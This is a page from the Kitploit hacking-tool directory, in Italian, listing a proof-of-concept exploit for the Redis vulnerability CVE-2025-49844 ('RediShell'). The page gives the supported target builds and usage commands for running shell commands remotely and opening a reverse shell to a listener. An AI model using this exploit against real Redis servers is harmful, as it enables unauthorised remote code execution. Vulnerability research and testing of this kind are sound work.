Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2025-49844 — Prova di concetto per CVE-2025-49844 | Kitploit
Strumenti/GitHubGitHub/saneki/cve-2025-49844
Analisi delle VulnerabilitàExploitPenetration TestingCommand and ControlRed TeamingStrumento di Accesso Remoto
GitHubsaneki/cve-2025-49844

cve-2025-49844

Prova di concetto per CVE-2025-49844

Vedi Repository
2569 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-49844

Il mio proof-of-concept personale per CVE-2025-49844, noto anche come RediShell.

Build di destinazione supportate:

  • Immagine Docker Linux x86-64 redis:8.2.1-alpine
  • Immagine Docker Linux x86-64 redis:8.2.1-bookworm

È un po' rozzo, probabilmente non all'altezza di quello di Wiz Research. Tuttavia, sono contento di essere riuscito a farlo funzionare prima che i talk di Hexacon 2025 fossero caricati, e mi sono divertito molto a indagarlo.

Utilizzo

Esegui comandi shell unidirezionali:

root@kitploit:~
$ uv run cve-2025-49844 command "echo 'hello world' > /data/hello.txt"

Connettiti a una reverse shell:

root@kitploit:~
$ uv run cve-2025-49844 rshell -l 127.0.0.1 -p 4444
Scarica lo strumento